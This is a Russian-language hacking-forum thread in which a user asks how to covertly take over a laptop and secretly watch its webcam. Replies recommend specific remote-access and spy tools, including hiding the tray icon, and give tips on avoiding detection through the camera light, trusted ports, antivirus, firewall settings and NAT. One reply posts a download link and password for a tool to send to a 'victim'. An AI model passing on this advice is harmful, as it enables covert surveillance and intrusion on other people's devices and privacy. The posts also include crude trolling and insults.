Внимание!
Форум переезжает на новую платформу, в связи с чем регистрация и авторизация временно отключены.
В ближайшее время все функции станут доступны в обычном режиме.

Главная /ВЗЛОМ Удаленное управление ПК + веб-камера

В этой теме 32 ответа, 18 участников, последнее обновление  DarkJoker Devil 7 месяцев назад.

Просмотр 33 сообщений - с 1 по 33 (из 33 всего)
  • Автор
    Ответов

Dmitrii Obrazcov
    Участник

Добрый день уважаемые хакеры!

Ребята подскажите действующий рецепт удаленного управления ПК (ноутбук) с возможностью скрытого включения и просмотра веб-камеры. Возможны ли варианты с использованием не “хакерского” ПО типа троянов, и других прибамбасов, пусть возможно платные, но действенные и безопасные. Есть физический доступ.

Буду благодарен за помощь.

rango_topovich
    Участник

а я знаю зачем оно тибе надо

Dmitrii Obrazcov
    Участник

ORIGINAL: rango_topovich

а я знаю зачем оно тибе надо

Так и я знаю зачем оно мне надо :)

Лучше подскажи как это сделать((

mark danaos
    Участник

Dmitrii Obrazcov
    Участник

ORIGINAL: danaos

http://www.how-to-spy.com/ru/how-to-spy-your-room-with-pc-webcam.html

Сайт не внушает доверия.

rango_topovich
    Участник

и мне надо. напиши если что то палучится

Кирилл
    Участник

http://hosts.ixrad.ru/ Посмотри

Dmitrii Obrazcov
    Участник

ORIGINAL: }{aKir

http://hosts.ixrad.ru/ Посмотри

Спасибо, проверил, работает, но не подходит так как слишком простой функционал. Нет возможности включать и выключать удаленно просмотр.

Нужно что-нибудь по-серьёзнее.

rango_topovich
    Участник

в теории я могу сказать что серьёзнее – переделать прошивку вебки и залить её через большой троян

Dmitrii Obrazcov
    Участник

ORIGINAL: rango_topovich

в теории я могу сказать что серьёзнее – переделать прошивку вебки и залить её через большой троян

Друг, если ты знаешь такую серьёзную теорию, ты бы подсказал мне что-нибудь то что я мог бы сделать на практике :) Знаю что есть множество программ RAT типа радмин *VNC, всякие программы типа Hidden Camera и т.д. хакерских тулз типа DarkComet, просто по инету или ссылки устаревшие или ещё что-то не так. Хотелось бы просто чтобы кто-нибудь подсказал на практике что знает, юзал или юзает.

Попробую ещё раз описать что нужно: есть ноут с физ. доступом к нему, на нем винда семерка. Нужно организовать прямое (по возможности без промежуточных серверов) вещание с нормальным качеством, по принципу – “Я, т.е. клиент подключился – вебка вещает, я отключился, вебка – отключилась”, т.е. постоянная запись и вещание не нужно, никаких отправок на фтп и т.д. Инет на ноуте вай-фай, других технических подробностей как раздается и т.д. незнаю. Ну и скрытность само собой.

Подскажите, в долгу не останусь.

вуда
    Участник
    dmitrii.obrazcov

если ты будешь вкл и выключать камеру у пользователя то он наверное поймет что ктото пользуется его камерой, ну а если лампочка горит с самого запуска компа и до завершения пользователь только наверное подумает что унего гдето требуется обновление для компа раз камера работает с ошибкой. А если лампочка будет мигать уж это очень подозрительно

я тучка тучка тучка – я вовсе не медведь

если использовать доверенные сетевым фильтром 80 и 8080 порты то маловероятно пользователь тоже очемто догадается, таккак многое антивирусники выдают сообщение мол такаята программа чтото пытается послать по такомуто порту тудато – это не есть хорошо.
    Простой функционал еще неговорит что это ненадежно. Простые вещи необходимы в быту.

anonimus_tot_c_guim
    Участник

есть например куча программ как например мультибар,само устанавливается и включается,а антивирус почему то с ней дружит,а если переделывать прошивку вебки то я думаю тому кто будет переделывать не составит труда разобраться с лампочкой

asaki kasa
    Участник

Radmin Ghost Для
    Удаленное управление
    RemCam2 Для вебки,хотя и через Radmin можно включить

Dmitrii Obrazcov
    Участник
    если ты будешь вкл и выключать камеру у пользователя то он наверное поймет что ктото пользуется его камерой, ну а если лампочка горит с самого запуска компа и до завершения пользователь только наверное подумает что унего гдето требуется обновление для компа раз камера работает с ошибкой. А если лампочка будет мигать уж это очень подозрительно

В моем случае все гораздо проще, у меня ноутбук на котором у веб-камеры нет никакой лампочки :)

если использовать доверенные сетевым фильтром 80 и 8080 порты то маловероятно пользователь тоже очемто догадается, таккак многое антивирусники выдают сообщение мол такаята программа чтото пытается послать по такомуто порту тудато – это не есть хорошо.

Как я писал в начале у меня есть доступ к компу, и я могу настроить файрволл(nod32SS) так как будет необходимо.

Radmin Ghost

sheva345 подскажи где эту штуку достать?

И ещё вопрос: я так понял что если удаленный комп стоит за NAT’от, то необходимо решение с бэкконектом. В связи с этим вопрос: как наверняка узнать стоит ли удаленный комп за NAT’ом или нет?

gsgsg_on_tot
    Участник

я не пойму,последний вопрос – “подключен ли нужный комп к сети?” – ну если не подключен,то иди к нему пишком,открой отмычками замок,подсоедини вебку к проводке возле места где её не обнаружат и ракурс лучше,ноутбук ещё туда впиндюрь с модемом,смотри на компе с ноута и плати двойную плату за интернет!

asaki kasa
    Участник

Держи, фаил urc* жертве отправляешь,да и ip узнаи
    пароль для соединения privedmidved
    http://www15.zippyshare.com/v/28941900/file.html

Dmitrii Obrazcov
    Участник

ORIGINAL: gsgsg_on_tot

я не пойму,последний вопрос – “подключен ли нужный комп к сети?” – ну если не подключен,то иди к нему пишком,открой отмычками замок,подсоедини вебку к проводке возле места где её не обнаружат и ракурс лучше,ноутбук ещё туда впиндюрь с модемом,смотри на компе с ноута и плати двойную плату за интернет!

Я такой вопрос не задавал.

sheva345, больше спасибо, попробую разобраться, позже отпишусь.

gsgsg_nik
    Участник

sheva345
    Дух сети скинул тебе ссылку с вирусняком, и даже если получится включить веб трансляцию,там будет только рожа в футболке

Dmitrii Obrazcov
    Участник

gsgsg_nik Не понял тебя.

gsgsg_nik
    Участник

что тут непонятного? прога в ссылке шевы с вирусом я проверял,а если ты думаешь что по вебке сразу прям стриптиз будет,так это врятли

Dmitrii Obrazcov
    Участник

ORIGINAL: gsgsg_nik

что тут непонятного? прога в ссылке шевы с вирусом я проверял,а если ты думаешь что по вебке сразу прям стриптиз будет,так это врятли

Про вирус я понял, ну так антивирь же на любое подобное ПО ругается, на те же кейгены и т.д. А насчет стриптиза, друг я бы не искал ради этого прогу, мне она нужна для других не сексуальных целей))

zzsnn
    Участник

Не напрягайся с gsgsg_nik. На него здесь просто не обращают внимание, а ему троллить охота, ему как любому пидару хочется что бы на него внимание обращали. А мозгов как у курёнка.
    На прогу реагирует антивирь. Но это ничего не значит. Он и должен реагировать на подобные действия от прог. Прога, как прога. Пробуй. Но отвественность за последствия несёшь ты сам.

tot_gsgsg
    Участник

zzsnn, я не голубой,а какова цвета у тебя картинка с надписью sys_admins?![sm=dm.gif]

tot_gsgsg_nik
    Участник

zzsnn – пидр

gsgsg_nikname
    Участник

я тебя тоже уважаю зз…[sm=poster_ban.gif]

Классная программа, бесплатная, официальная, сам хочу испытать на днях, как попробую отпишусь подробней. Вот ссылка http://www.teamviewer.com/
    В твоем случае на мой взгляд то что надо.
    Есть еще вот этот сайт, но тут услуга платная я не пробовал, кто попробует прошу отписаться не развод ли это. Вот ссылка http://software-tracking.ru/

mmajor
    Участник

teamviwer удобная и бесплатная прога предназначенная именно для удаленного управления копмом, много функций, но смотреть в камеру она вроде не умеет. а swtracking направленна именно для скрытого наблюдения через веб-камеру.

СИёжик СИёжик
    Участник
    как наверняка узнать стоит ли удаленный комп за NAT’ом или нет?

90% за NAT стоит…
    набираешь в командной строке cmd, затем ipconfig тебе выдает твой IP
    сравниваешь свой IP с IP например на этом сайте http://internet.yandex.ru/ , если сходится то у тебя белый IP.

Gitarist
    Участник

90% за NAT стоит…

RMS тогда не плохой вариант) тем более если физический доступ есть просто устанавливаешь сервер у жертвы только галочку не забудь поставить в конфигураторе “не показывать значок в трее”

Ребята скажите пожалуйста, установил на компьютер “жертве” “RAdmin Private Release”, когда подключаюсь к компьютеру “жертвы” отключается эффект прозрачности окон и рабочей полнели, естественно “жертва” сразу видит что с компьютером что то не ладное, да забыл сказать что и у меня стоит Windows7 и у “жертвы”. Как можно побороть эту проблему или я что то не правильно делаю, может это убирается настройками программы, пожалуйста подскажите мне не грамотному!

DarkJoker Devil
    Участник

Радмин не актуален,есть проги куда успешнее.

zzsnn
    Участник

почему не актуален? Одно из немногих приложений, которые до сих пор обязательна для изучения и работы любого админа. Не идеал, но идеала и нет среди группы данных приложений. Достаточно проста, достаточно нетребовательна и с богатым функционалом.

DarkJoker Devil
    Участник

Радмин нат не пробивает,для этих целей идеальную прогу брал тут http://spyadmin.com/ программа на много обходит все остальные.Работает за нат,пробивает все фаерволы и антивири.Если берёте в инете такие проги-обязательно просите тест,тк кидалы не дремлют.

Просмотр 33 сообщений - с 1 по 33 (из 33 всего)

Вы должны авторизироваться для ответа в этой теме.